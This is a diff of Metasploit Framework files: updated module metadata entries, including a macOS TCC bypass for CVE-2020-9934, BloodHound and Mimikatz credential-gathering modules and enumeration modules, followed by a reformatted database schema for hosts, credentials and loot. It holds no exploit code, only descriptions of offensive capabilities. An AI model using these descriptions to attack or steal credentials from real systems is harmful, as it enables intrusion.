+    "fullname": "post/networking/gather/enum_mikrotik",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "h00die"
+    ],
+    "description": "This module collects Mikrotik device information and configuration.\n          This module has been tested against RouterOS 6.45.9.",
+    "references": [
+
+    ],
+    "platform": "Mikrotik",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-07-30 11:29:25 +0000",
+    "path": "/modules/post/networking/gather/enum_mikrotik.rb",
+    "is_install_path": true,
+    "ref_name": "networking/gather/enum_mikrotik",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "post_osx/admin/say": {
    "name": "OS X Text to Speech Utility",
    "fullname": "post/osx/admin/say",
@@ -170526,6 +173682,46 @@
    },
    "needs_cleanup": null
  },
+  "post_osx/escalate/tccbypass": {
+    "name": "Bypass the macOS TCC Framework",
+    "fullname": "post/osx/escalate/tccbypass",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "mattshockl",
+      "timwr"
+    ],
+    "description": "This module exploits a vulnerability in the TCC daemon on macOS Catalina\n          (<= 10.15.5) in order to grant TCC entitlements. The TCC daemon can be\n          manipulated (by setting the HOME environment variable) to use a new user\n          controlled location as the TCC database. We can then grant ourselves\n          entitlements by inserting them into this new database.",
+    "references": [
+      "CVE-2020-9934",
+      "URL-https://medium.com/@mattshockl/cve-2020-9934-bypassing-the-os-x-transparency-consent-and-control-tcc-framework-for-4e14806f1de8",
+      "URL-https://github.com/mattshockl/CVE-2020-9934"
+    ],
+    "platform": "OSX",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-11 15:07:52 +0000",
+    "path": "/modules/post/osx/escalate/tccbypass.rb",
+    "is_install_path": true,
+    "ref_name": "osx/escalate/tccbypass",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "SideEffects": [
+        "artifacts-on-disk",
+        "screen-effects"
+      ]
+    },
+    "needs_cleanup": null
+  },
  "post_osx/gather/apfs_encrypted_volume_passwd": {
    "name": "Mac OS X APFS Encrypted Volume Password Disclosure",
    "fullname": "post/osx/gather/apfs_encrypted_volume_passwd",
@@ -170815,7 +174011,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-04-15 21:01:05 +0000",
+    "mod_time": "2020-08-18 16:02:24 +0000",
    "path": "/modules/post/osx/gather/enum_osx.rb",
    "is_install_path": true,
    "ref_name": "osx/gather/enum_osx",
@@ -171762,9 +174958,10 @@
    "disclosure_date": null,
    "type": "post",
    "author": [
-      "h4ng3r <h4ng3r@computerpirate.me>"
+      "h4ng3r <h4ng3r@computerpirate.me>",
+      "h00die"
    ],
-    "description": "This module will execute the BloodHound C# Ingestor (aka SharpHound) to gather sessions, local admin, domain trusts and more. With this information BloodHound will easily identify highly complex attack paths that would otherwise be impossible to quickly identify within an Active Directory environment.",
+    "description": "This module will execute the BloodHound C# Ingestor (aka SharpHound) to gather sessions, local admin, domain trusts and more.\n          With this information BloodHound will easily identify highly complex attack paths that would otherwise be impossible to quickly\n          identify within an Active Directory environment.",
    "references": [

    ],
@@ -171774,7 +174971,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-10-16 17:53:02 +0000",
+    "mod_time": "2020-06-03 20:46:39 +0000",
    "path": "/modules/post/windows/gather/bloodhound.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/bloodhound",
@@ -171782,6 +174979,12 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "AKA": [
+        "sharphound"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk"
+      ]
    },
    "needs_cleanup": null
  },
@@ -171832,7 +175035,7 @@
      "Carlos Perez <carlos_perez@darkoperator.com>",
      "Aaron Soto <aaron_soto@rapid7.com>"
    ],
-    "description": "This module attempts to determine whether the system is running\n        inside of a virtual environment and if so, which one. This\n        module supports detection of Hyper-V, VMWare, Virtual PC,\n        VirtualBox, Xen, and QEMU.",
+    "description": "This module attempts to determine whether the system is running\n          inside of a virtual environment and if so, which one. This\n          module supports detection of Hyper-V, VMWare, Virtual PC,\n          VirtualBox, Xen, and QEMU.",
    "references": [

    ],
@@ -171842,7 +175045,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-01-17 16:41:21 +0000",
+    "mod_time": "2020-07-10 18:10:26 +0000",
    "path": "/modules/post/windows/gather/checkvm.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/checkvm",
@@ -173052,7 +176255,7 @@
    "author": [
      "Ben Campbell <eat_meatballs@hotmail.co.uk>"
    ],
-    "description": "This module will collect cleartext Single Sign On credentials from the Local\n      Security Authority using the Mimikatz extension. Blank passwords will not be stored\n      in the database.",
+    "description": "This module will collect cleartext Single Sign On credentials from the Local\n      Security Authority using the Kiwi (Mimikatz) extension. Blank passwords will not be stored\n      in the database.",
    "references": [

    ],
@@ -173062,7 +176265,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-28 12:34:44 +0000",
    "path": "/modules/post/windows/gather/credentials/sso.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/sso",
@@ -174280,6 +177483,39 @@
    },
    "needs_cleanup": null
  },
+  "post_windows/gather/enum_hyperv_vms": {
+    "name": "Windows Hyper-V VM Enumeration",
+    "fullname": "post/windows/gather/enum_hyperv_vms",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "gwillcox-r7"
+    ],
+    "description": "This module will check if the target machine is a Hyper-V host and, if it is, will return a list of all\n          of the VMs running on the host, as well as stats such as their state, version, CPU Usage, uptime, and status.",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-16 16:02:54 +0000",
+    "path": "/modules/post/windows/gather/enum_hyperv_vms.rb",
+    "is_install_path": true,
+    "ref_name": "windows/gather/enum_hyperv_vms",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "post_windows/gather/enum_ie": {
    "name": "Windows Gather Internet Explorer User Data Enumeration",
    "fullname": "post/windows/gather/enum_ie",
@@ -174425,7 +177661,7 @@
      "zeroSteiner <zeroSteiner@gmail.com>",
      "mubix <mubix@hak5.org>"
    ],
-    "description": "This module will attempt to enumerate which patches are applied to a windows system\n          based on the result of the WMI query: SELECT HotFixID FROM Win32_QuickFixEngineering.",
+    "description": "This module will attempt to enumerate which patches are applied to a windows system\n          based on the result of the WMI query: SELECT HotFixID, InstalledOn FROM Win32_QuickFixEngineering.",
    "references": [
      "URL-http://msdn.microsoft.com/en-us/library/aa394391(v=vs.85).aspx"
    ],
@@ -174435,7 +177671,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-01-14 20:49:39 +0000",
+    "mod_time": "2020-09-02 11:33:50 +0000",
    "path": "/modules/post/windows/gather/enum_patches.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_patches",
@@ -174468,7 +177704,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-09-05 10:43:41 +0000",
    "path": "/modules/post/windows/gather/enum_powershell_env.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_powershell_env",
@@ -1,4 +1,3 @@
-# encoding: UTF-8
 # This file is auto-generated from the current state of the database. Instead
 # of editing this file, please use the migrations feature of Active Record to
 # incrementally modify your database, and then regenerate this schema definition.
@@ -11,82 +10,77 @@
 #
 # It's strongly recommended that you check this file into your version control system.

-ActiveRecord::Schema.define(version: 20190507120211) do
+ActiveRecord::Schema.define(version: 2019_05_07_120211) do

  # These are extensions that must be enabled in order to support this database
  enable_extension "plpgsql"

-  create_table "api_keys", force: :cascade do |t|
-    t.text     "token"
+  create_table "api_keys", id: :serial, force: :cascade do |t|
+    t.text "token"
    t.datetime "created_at", null: false
    t.datetime "updated_at", null: false
  end

-  create_table "async_callbacks", force: :cascade do |t|
-    t.string   "uuid",           null: false
-    t.integer  "timestamp",      null: false
-    t.string   "listener_uri"
-    t.string   "target_host"
-    t.string   "target_port"
-    t.datetime "created_at",     null: false
-    t.datetime "updated_at",     null: false
-    t.uuid     "{:null=>false}"
-  end
-
-  create_table "automatic_exploitation_match_results", force: :cascade do |t|
-    t.integer  "match_id"
-    t.integer  "run_id"
-    t.string   "state",      null: false
+  create_table "async_callbacks", id: :serial, force: :cascade do |t|
+    t.string "uuid", null: false
+    t.integer "timestamp", null: false
+    t.string "listener_uri"
+    t.string "target_host"
+    t.string "target_port"
    t.datetime "created_at", null: false
    t.datetime "updated_at", null: false
  end

-  add_index "automatic_exploitation_match_results", ["match_id"], name: "index_automatic_exploitation_match_results_on_match_id", using: :btree
-  add_index "automatic_exploitation_match_results", ["run_id"], name: "index_automatic_exploitation_match_results_on_run_id", using: :btree
-
-  create_table "automatic_exploitation_match_sets", force: :cascade do |t|
-    t.integer  "workspace_id"
-    t.integer  "user_id"
-    t.datetime "created_at",   null: false
-    t.datetime "updated_at",   null: false
+  create_table "automatic_exploitation_match_results", id: :serial, force: :cascade do |t|
+    t.integer "match_id"
+    t.integer "run_id"
+    t.string "state", null: false
+    t.datetime "created_at", null: false
+    t.datetime "updated_at", null: false
+    t.index ["match_id"], name: "index_automatic_exploitation_match_results_on_match_id"
+    t.index ["run_id"], name: "index_automatic_exploitation_match_results_on_run_id"
  end

-  add_index "automatic_exploitation_match_sets", ["user_id"], name: "index_automatic_exploitation_match_sets_on_user_id", using: :btree
-  add_index "automatic_exploitation_match_sets", ["workspace_id"], name: "index_automatic_exploitation_match_sets_on_workspace_id", using: :btree
-
-  create_table "automatic_exploitation_matches", force: :cascade do |t|
-    t.integer  "module_detail_id"
-    t.string   "state"
-    t.integer  "nexpose_data_vulnerability_definition_id"
-    t.datetime "created_at",                               null: false
-    t.datetime "updated_at",                               null: false
-    t.integer  "match_set_id"
-    t.string   "matchable_type"
-    t.integer  "matchable_id"
-    t.text     "module_fullname"
+  create_table "automatic_exploitation_match_sets", id: :serial, force: :cascade do |t|
+    t.integer "workspace_id"
+    t.integer "user_id"
+    t.datetime "created_at", null: false
+    t.datetime "updated_at", null: false
+    t.index ["user_id"], name: "index_automatic_exploitation_match_sets_on_user_id"
+    t.index ["workspace_id"], name: "index_automatic_exploitation_match_sets_on_workspace_id"
  end

-  add_index "automatic_exploitation_matches", ["module_detail_id"], name: "index_automatic_exploitation_matches_on_module_detail_id", using: :btree
-  add_index "automatic_exploitation_matches", ["module_fullname"], name: "index_automatic_exploitation_matches_on_module_fullname", using: :btree
-
-  create_table "automatic_exploitation_runs", force: :cascade do |t|
-    t.integer  "workspace_id"
-    t.integer  "user_id"
-    t.integer  "match_set_id"
-    t.datetime "created_at",   null: false
-    t.datetime "updated_at",   null: false
+  create_table "automatic_exploitation_matches", id: :serial, force: :cascade do |t|
+    t.integer "module_detail_id"
+    t.string "state"
+    t.integer "nexpose_data_vulnerability_definition_id"
+    t.datetime "created_at", null: false
+    t.datetime "updated_at", null: false
+    t.integer "match_set_id"
+    t.string "matchable_type"
+    t.integer "matchable_id"
+    t.text "module_fullname"
+    t.index ["module_detail_id"], name: "index_automatic_exploitation_matches_on_module_detail_id"
+    t.index ["module_fullname"], name: "index_automatic_exploitation_matches_on_module_fullname"
  end

-  add_index "automatic_exploitation_runs", ["match_set_id"], name: "index_automatic_exploitation_runs_on_match_set_id", using: :btree
-  add_index "automatic_exploitation_runs", ["user_id"], name: "index_automatic_exploitation_runs_on_user_id", using: :btree
-  add_index "automatic_exploitation_runs", ["workspace_id"], name: "index_automatic_exploitation_runs_on_workspace_id", using: :btree
+  create_table "automatic_exploitation_runs", id: :serial, force: :cascade do |t|
+    t.integer "workspace_id"
+    t.integer "user_id"
+    t.integer "match_set_id"
+    t.datetime "created_at", null: false
+    t.datetime "updated_at", null: false
+    t.index ["match_set_id"], name: "index_automatic_exploitation_runs_on_match_set_id"
+    t.index ["user_id"], name: "index_automatic_exploitation_runs_on_user_id"
+    t.index ["workspace_id"], name: "index_automatic_exploitation_runs_on_workspace_id"
+  end

-  create_table "clients", force: :cascade do |t|
-    t.integer  "host_id"
+  create_table "clients", id: :serial, force: :cascade do |t|
+    t.integer "host_id"
    t.datetime "created_at"
-    t.string   "ua_string",  limit: 1024, null: false
-    t.string   "ua_name",    limit: 64
-    t.string   "ua_ver",     limit: 32
+    t.string "ua_string", limit: 1024, null: false
+    t.string "ua_name", limit: 64
+    t.string "ua_ver", limit: 32
    t.datetime "updated_at"
  end

@@ -100,743 +94,713 @@ ActiveRecord::Schema.define(version: 20190507120211) do
    t.integer "task_id"
  end

-  create_table "creds", force: :cascade do |t|
-    t.integer  "service_id",                              null: false
-    t.datetime "created_at",                              null: false
-    t.datetime "updated_at",                              null: false
-    t.string   "user",        limit: 2048
-    t.string   "pass",        limit: 4096
-    t.boolean  "active",                   default: true
-    t.string   "proof",       limit: 4096
-    t.string   "ptype",       limit: 256
-    t.integer  "source_id"
-    t.string   "source_type"
+  create_table "creds", id: :serial, force: :cascade do |t|
+    t.integer "service_id", null: false
+    t.datetime "created_at", null: false
+    t.datetime "updated_at", null: false
+    t.string "user", limit: 2048
+    t.string "pass", limit: 4096
+    t.boolean "active", default: true
+    t.string "proof", limit: 4096
+    t.string "ptype", limit: 256
+    t.integer "source_id"
+    t.string "source_type"
  end

-  create_table "events", force: :cascade do |t|
-    t.integer  "workspace_id"
-    t.integer  "host_id"
+  create_table "events", id: :serial, force: :cascade do |t|
+    t.integer "workspace_id"
+    t.integer "host_id"
    t.datetime "created_at"
-    t.string   "name"
+    t.string "name"
    t.datetime "updated_at"
-    t.boolean  "critical"
-    t.boolean  "seen"
-    t.string   "username"
-    t.text     "info"
+    t.boolean "critical"
+    t.boolean "seen"
+    t.string "username"
+    t.text "info"
  end

-  create_table "exploit_attempts", force: :cascade do |t|
-    t.integer  "host_id"
-    t.integer  "service_id"
-    t.integer  "vuln_id"
+  create_table "exploit_attempts", id: :serial, force: :cascade do |t|
+    t.integer "host_id"
+    t.integer "service_id"
+    t.integer "vuln_id"
    t.datetime "attempted_at"
-    t.boolean  "exploited"
-    t.string   "fail_reason"
-    t.string   "username"
-    t.text     "module"
-    t.integer  "session_id"
-    t.integer  "loot_id"
-    t.integer  "port"
-    t.string   "proto"
-    t.text     "fail_detail"
+    t.boolean "exploited"
+    t.string "fail_reason"
+    t.string "username"
+    t.text "module"
+    t.integer "session_id"
+    t.integer "loot_id"
+    t.integer "port"
+    t.string "proto"
+    t.text "fail_detail"
  end

-  create_table "exploited_hosts", force: :cascade do |t|
-    t.integer  "host_id",                   null: false
-    t.integer  "service_id"
-    t.string   "session_uuid", limit: 8
-    t.string   "name",         limit: 2048
-    t.string   "payload",      limit: 2048
-    t.datetime "created_at",                null: false
-    t.datetime "updated_at",                null: false
+  create_table "exploited_hosts", id: :serial, force: :cascade do |t|
+    t.integer "host_id", null: false
+    t.integer "service_id"
+    t.string "session_uuid", limit: 8
+    t.string "name", limit: 2048
+    t.string "payload", limit: 2048
+    t.datetime "created_at", null: false
+    t.datetime "updated_at", null: false
  end

-  create_table "host_details", force: :cascade do |t|
+  create_table "host_details", id: :serial, force: :cascade do |t|
    t.integer "host_id"
    t.integer "nx_console_id"
    t.integer "nx_device_id"
-    t.string  "src"
-    t.string  "nx_site_name"
-    t.string  "nx_site_importance"
-    t.string  "nx_scan_template"
-    t.float   "nx_risk_score"
+    t.string "src"
+    t.string "nx_site_name"
+    t.string "nx_site_importance"
+    t.string "nx_scan_template"
+    t.float "nx_risk_score"
  end

-  create_table "hosts", force: :cascade do |t|
+  create_table "hosts", id: :serial, force: :cascade do |t|
    t.datetime "created_at"
-    t.inet     "address",                                         null: false
-    t.string   "mac"
-    t.string   "comm"
-    t.string   "name"
-    t.string   "state"
-    t.string   "os_name"
-    t.string   "os_flavor"
-    t.string   "os_sp"
-    t.string   "os_lang"
-    t.string   "arch"
-    t.integer  "workspace_id",                                    null: false
+    t.inet "address", null: false
+    t.string "mac"
+    t.string "comm"
+    t.string "name"
+    t.string "state"
+    t.string "os_name"
+    t.string "os_flavor"
+    t.string "os_sp"
+    t.string "os_lang"
+    t.string "arch"
+    t.integer "workspace_id", null: false
    t.datetime "updated_at"
-    t.text     "purpose"
-    t.string   "info",                  limit: 65536
-    t.text     "comments"
-    t.text     "scope"
-    t.text     "virtual_host"
-    t.integer  "note_count",                          default: 0
-    t.integer  "vuln_count",                          default: 0
-    t.integer  "service_count",                       default: 0
-    t.integer  "host_detail_count",                   default: 0
-    t.integer  "exploit_attempt_count",               default: 0
-    t.integer  "cred_count",                          default: 0
-    t.string   "detected_arch"
-    t.string   "os_family"
+    t.text "purpose"
+    t.string "info", limit: 65536
+    t.text "comments"
+    t.text "scope"
+    t.text "virtual_host"
+    t.integer "note_count", default: 0
+    t.integer "vuln_count", default: 0
+    t.integer "service_count", default: 0
+    t.integer "host_detail_count", default: 0
+    t.integer "exploit_attempt_count", default: 0
+    t.integer "cred_count", default: 0
+    t.string "detected_arch"
+    t.string "os_family"
+    t.index ["name"], name: "index_hosts_on_name"
+    t.index ["os_flavor"], name: "index_hosts_on_os_flavor"
+    t.index ["os_name"], name: "index_hosts_on_os_name"
+    t.index ["purpose"], name: "index_hosts_on_purpose"
+    t.index ["state"], name: "index_hosts_on_state"
+    t.index ["workspace_id", "address"], name: "index_hosts_on_workspace_id_and_address", unique: true
  end

-  add_index "hosts", ["name"], name: "index_hosts_on_name", using: :btree
-  add_index "hosts", ["os_flavor"], name: "index_hosts_on_os_flavor", using: :btree
-  add_index "hosts", ["os_name"], name: "index_hosts_on_os_name", using: :btree
-  add_index "hosts", ["purpose"], name: "index_hosts_on_purpose", using: :btree
-  add_index "hosts", ["state"], name: "index_hosts_on_state", using: :btree
-  add_index "hosts", ["workspace_id", "address"], name: "index_hosts_on_workspace_id_and_address", unique: true, using: :btree
-
-  create_table "hosts_tags", force: :cascade do |t|
+  create_table "hosts_tags", id: :serial, force: :cascade do |t|
    t.integer "host_id"
    t.integer "tag_id"
  end

-  create_table "listeners", force: :cascade do |t|
-    t.datetime "created_at",                  null: false
-    t.datetime "updated_at",                  null: false
-    t.integer  "workspace_id", default: 1,    null: false
-    t.integer  "task_id"
-    t.boolean  "enabled",      default: true
-    t.text     "owner"
-    t.text     "payload"
-    t.text     "address"
-    t.integer  "port"
-    t.binary   "options"
-    t.text     "macro"
+  create_table "listeners", id: :serial, force: :cascade do |t|
+    t.datetime "created_at", null: false
+    t.datetime "updated_at", null: false
+    t.integer "workspace_id", default: 1, null: false
+    t.integer "task_id"
+    t.boolean "enabled", default: true
+    t.text "owner"
+    t.text "payload"
+    t.text "address"
+    t.integer "port"
+    t.binary "options"
+    t.text "macro"
  end

-  create_table "loots", force: :cascade do |t|
-    t.integer  "workspace_id",               default: 1, null: false
-    t.integer  "host_id"
-    t.integer  "service_id"
-    t.string   "ltype",         limit: 512
-    t.string   "path",          limit: 1024
-    t.text     "data"
-    t.datetime "created_at",                             null: false
-    t.datetime "updated_at",                             null: false
-    t.string   "content_type"
-    t.text     "name"
-    t.text     "info"
-    t.integer  "module_run_id"
+  create_table "loots", id: :serial, force: :cascade do |t|
+    t.integer "workspace_id", default: 1, null: false
+    t.integer "host_id"
+    t.integer "service_id"
+    t.string "ltype", limit: 512
+    t.string "path", limit: 1024
+    t.text "data"
+    t.datetime "created_at", null: false
+    t.datetime "updated_at", null: false
+    t.string "content_type"
+    t.text "name"
+    t.text "info"
+    t.integer "module_run_id"
+    t.index ["module_run_id"], name: "index_loots_on_module_run_id"
  end

-  add_index "loots", ["module_run_id"], name: "index_loots_on_module_run_id", using: :btree
-
-  create_table "macros", force: :cascade do |t|
-    t.datetime "created_at",  null: false
-    t.datetime "updated_at",  null: false
-    t.text     "owner"
-    t.text     "name"
-    t.text     "description"
-    t.binary   "actions"
-    t.binary   "prefs"
+  create_table "macros", id: :serial, force: :cascade do |t|
+    t.datetime "created_at", null: false
+    t.datetime "updated_at", null: false
+    t.text "owner"
+    t.text "name"
+    t.text "description"
+    t.binary "actions"
+    t.binary "prefs"
  end

-  create_table "metasploit_credential_cores", force: :cascade do |t|
-    t.integer  "origin_id",                null: false
-    t.string   "origin_type",              null: false
-    t.integer  "private_id"
-    t.integer  "public_id"
-    t.integer  "realm_id"
-    t.integer  "workspace_id",             null: false
-    t.datetime "created_at",               null: false
-    t.datetime "updated_at",               null: false
-    t.integer  "logins_count", default: 0
+  create_table "metasploit_credential_cores", id: :serial, force: :cascade do |t|
+    t.string "origin_type", null: false
+    t.integer "origin_id", null: false
+    t.integer "private_id"
+    t.integer "public_id"
+    t.integer "realm_id"
+    t.integer "workspace_id", null: false
+    t.datetime "created_at", null: false
+    t.datetime "updated_at", null: false
+    t.integer "logins_count", default: 0
+    t.index ["origin_type", "origin_id"], name: "index_metasploit_credential_cores_on_origin_type_and_origin_id"
+    t.index ["private_id"], name: "index_metasploit_credential_cores_on_private_id"
+    t.index ["public_id"], name: "index_metasploit_credential_cores_on_public_id"
+    t.index ["realm_id"], name: "index_metasploit_credential_cores_on_realm_id"
+    t.index ["workspace_id", "private_id"], name: "unique_private_metasploit_credential_cores", unique: true, where: "((realm_id IS NULL) AND (public_id IS NULL) AND (private_id IS NOT NULL))"
+    t.index ["workspace_id", "public_id", "private_id"], name: "unique_realmless_metasploit_credential_cores", unique: true, where: "((realm_id IS NULL) AND (public_id IS NOT NULL) AND (private_id IS NOT NULL))"
+    t.index ["workspace_id", "public_id"], name: "unique_public_metasploit_credential_cores", unique: true, where: "((realm_id IS NULL) AND (public_id IS NOT NULL) AND (private_id IS NULL))"
+    t.index ["workspace_id", "realm_id", "private_id"], name: "unique_publicless_metasploit_credential_cores", unique: true, where: "((realm_id IS NOT NULL) AND (public_id IS NULL) AND (private_id IS NOT NULL))"
+    t.index ["workspace_id", "realm_id", "public_id", "private_id"], name: "unique_complete_metasploit_credential_cores", unique: true, where: "((realm_id IS NOT NULL) AND (public_id IS NOT NULL) AND (private_id IS NOT NULL))"
+    t.index ["workspace_id", "realm_id", "public_id"], name: "unique_privateless_metasploit_credential_cores", unique: true, where: "((realm_id IS NOT NULL) AND (public_id IS NOT NULL) AND (private_id IS NULL))"
+    t.index ["workspace_id"], name: "index_metasploit_credential_cores_on_workspace_id"
  end

-  add_index "metasploit_credential_cores", ["origin_type", "origin_id"], name: "index_metasploit_credential_cores_on_origin_type_and_origin_id", using: :btree
-  add_index "metasploit_credential_cores", ["private_id"], name: "index_metasploit_credential_cores_on_private_id", using: :btree
-  add_index "metasploit_credential_cores", ["public_id"], name: "index_metasploit_credential_cores_on_public_id", using: :btree
-  add_index "metasploit_credential_cores", ["realm_id"], name: "index_metasploit_credential_cores_on_realm_id", using: :btree
-  add_index "metasploit_credential_cores", ["workspace_id", "private_id"], name: "unique_private_metasploit_credential_cores", unique: true, where: "((realm_id IS NULL) AND (public_id IS NULL) AND (private_id IS NOT NULL))", using: :btree
-  add_index "metasploit_credential_cores", ["workspace_id", "public_id", "private_id"], name: "unique_realmless_metasploit_credential_cores", unique: true, where: "((realm_id IS NULL) AND (public_id IS NOT NULL) AND (private_id IS NOT NULL))", using: :btree
-  add_index "metasploit_credential_cores", ["workspace_id", "public_id"], name: "unique_public_metasploit_credential_cores", unique: true, where: "((realm_id IS NULL) AND (public_id IS NOT NULL) AND (private_id IS NULL))", using: :btree
-  add_index "metasploit_credential_cores", ["workspace_id", "realm_id", "private_id"], name: "unique_publicless_metasploit_credential_cores", unique: true, where: "((realm_id IS NOT NULL) AND (public_id IS NULL) AND (private_id IS NOT NULL))", using: :btree
-  add_index "metasploit_credential_cores", ["workspace_id", "realm_id", "public_id", "private_id"], name: "unique_complete_metasploit_credential_cores", unique: true, where: "((realm_id IS NOT NULL) AND (public_id IS NOT NULL) AND (private_id IS NOT NULL))", using: :btree
-  add_index "metasploit_credential_cores", ["workspace_id", "realm_id", "public_id"], name: "unique_privateless_metasploit_credential_cores", unique: true, where: "((realm_id IS NOT NULL) AND (public_id IS NOT NULL) AND (private_id IS NULL))", using: :btree
-  add_index "metasploit_credential_cores", ["workspace_id"], name: "index_metasploit_credential_cores_on_workspace_id", using: :btree
-
-  create_table "metasploit_credential_logins", force: :cascade do |t|
-    t.integer  "core_id",           null: false
-    t.integer  "service_id",        null: false
-    t.string   "access_level"
-    t.string   "status",            null: false
+  create_table "metasploit_credential_logins", id: :serial, force: :cascade do |t|
+    t.integer "core_id", null: false
+    t.integer "service_id", null: false
+    t.string "access_level"
+    t.string "status", null: false
    t.datetime "last_attempted_at"
-    t.datetime "created_at",        null: false
-    t.datetime "updated_at",        null: false
-  end
-
-  add_index "metasploit_credential_logins", ["core_id", "service_id"], name: "index_metasploit_credential_logins_on_core_id_and_service_id", unique: true, using: :btree
-  add_index "metasploit_credential_logins", ["service_id", "core_id"], name: "index_metasploit_credential_logins_on_service_id_and_core_id", unique: true, using: :btree
-
-  create_table "metasploit_credential_origin_cracked_passwords", force: :cascade do |t|
-    t.integer  "metasploit_credential_core_id", null: false
-    t.datetime "created_at",                    null: false
-    t.datetime "updated_at",                    null: false
-  end
-
-  add_index "metasploit_credential_origin_cracked_passwords", ["metasploit_credential_core_id"], name: "originating_credential_cores", using: :btree
-
-  create_table "metasploit_credential_origin_imports", force: :cascade do |t|
-    t.text     "filename",   null: false
-    t.integer  "task_id"
    t.datetime "created_at", null: false
    t.datetime "updated_at", null: false
+    t.index ["core_id", "service_id"], name: "index_metasploit_credential_logins_on_core_id_and_service_id", unique: true
+    t.index ["service_id", "core_id"], name: "index_metasploit_credential_logins_on_service_id_and_core_id", unique: true
  end

-  add_index "metasploit_credential_origin_imports", ["task_id"], name: "index_metasploit_credential_origin_imports_on_task_id", using: :btree
-
-  create_table "metasploit_credential_origin_manuals", force: :cascade do |t|
-    t.integer  "user_id",    null: false
+  create_table "metasploit_credential_origin_cracked_passwords", id: :serial, force: :cascade do |t|
+    t.integer "metasploit_credential_core_id", null: false
    t.datetime "created_at", null: false
    t.datetime "updated_at", null: false
+    t.index ["metasploit_credential_core_id"], name: "originating_credential_cores"
  end

-  add_index "metasploit_credential_origin_manuals", ["user_id"], name: "index_metasploit_credential_origin_manuals_on_user_id", using: :btree
-
-  create_table "metasploit_credential_origin_services", force: :cascade do |t|
-    t.integer  "service_id",       null: false
-    t.text     "module_full_name", null: false
-    t.datetime "created_at",       null: false
-    t.datetime "updated_at",       null: false
-  end
-
-  add_index "metasploit_credential_origin_services", ["service_id", "module_full_name"], name: "unique_metasploit_credential_origin_services", unique: true, using: :btree
-
-  create_table "metasploit_credential_origin_sessions", force: :cascade do |t|
-    t.text     "post_reference_name", null: false
-    t.integer  "session_id",          null: false
-    t.datetime "created_at",          null: false
-    t.datetime "updated_at",          null: false
-  end
-
-  add_index "metasploit_credential_origin_sessions", ["session_id", "post_reference_name"], name: "unique_metasploit_credential_origin_sessions", unique: true, using: :btree
-
-  create_table "metasploit_credential_privates", force: :cascade do |t|
-    t.string   "type",       null: false
-    t.text     "data",       null: false
+  create_table "metasploit_credential_origin_imports", id: :serial, force: :cascade do |t|
+    t.text "filename", null: false
+    t.integer "task_id"
    t.datetime "created_at", null: false
    t.datetime "updated_at", null: false
-    t.string   "jtr_format"
+    t.index ["task_id"], name: "index_metasploit_credential_origin_imports_on_task_id"
  end

-  add_index "metasploit_credential_privates", ["type", "data"], name: "index_metasploit_credential_privates_on_type_and_data", unique: true, where: "(NOT ((type)::text = 'Metasploit::Credential::SSHKey'::text))", using: :btree
-  add_index "metasploit_credential_privates", ["type"], name: "index_metasploit_credential_privates_on_type_and_data_sshkey", unique: true, where: "((type)::text = 'Metasploit::Credential::SSHKey'::text)", using: :btree
-
-  create_table "metasploit_credential_publics", force: :cascade do |t|
-    t.string   "username",   null: false
+  create_table "metasploit_credential_origin_manuals", id: :serial, force: :cascade do |t|
+    t.integer "user_id", null: false
    t.datetime "created_at", null: false
    t.datetime "updated_at", null: false
-    t.string   "type",       null: false
+    t.index ["user_id"], name: "index_metasploit_credential_origin_manuals_on_user_id"
  end

-  add_index "metasploit_credential_publics", ["username"], name: "index_metasploit_credential_publics_on_username", unique: true, using: :btree
-
-  create_table "metasploit_credential_realms", force: :cascade do |t|
-    t.string   "key",        null: false
-    t.string   "value",      null: false
+  create_table "metasploit_credential_origin_services", id: :serial, force: :cascade do |t|
+    t.integer "service_id", null: false
+    t.text "module_full_name", null: false
    t.datetime "created_at", null: false
    t.datetime "updated_at", null: false
+    t.index ["service_id", "module_full_name"], name: "unique_metasploit_credential_origin_services", unique: true
  end

-  add_index "metasploit_credential_realms", ["key", "value"], name: "index_metasploit_credential_realms_on_key_and_value", unique: true, using: :btree
+  create_table "metasploit_credential_origin_sessions", id: :serial, force: :cascade do |t|
+    t.text "post_reference_name", null: false
+    t.integer "session_id", null: false
+    t.datetime "created_at", null: false
+    t.datetime "updated_at", null: false
+    t.index ["session_id", "post_reference_name"], name: "unique_metasploit_credential_origin_sessions", unique: true
+  end

-  create_table "mod_refs", force: :cascade do |t|
+  create_table "metasploit_credential_privates", id: :serial, force: :cascade do |t|
+    t.string "type", null: false
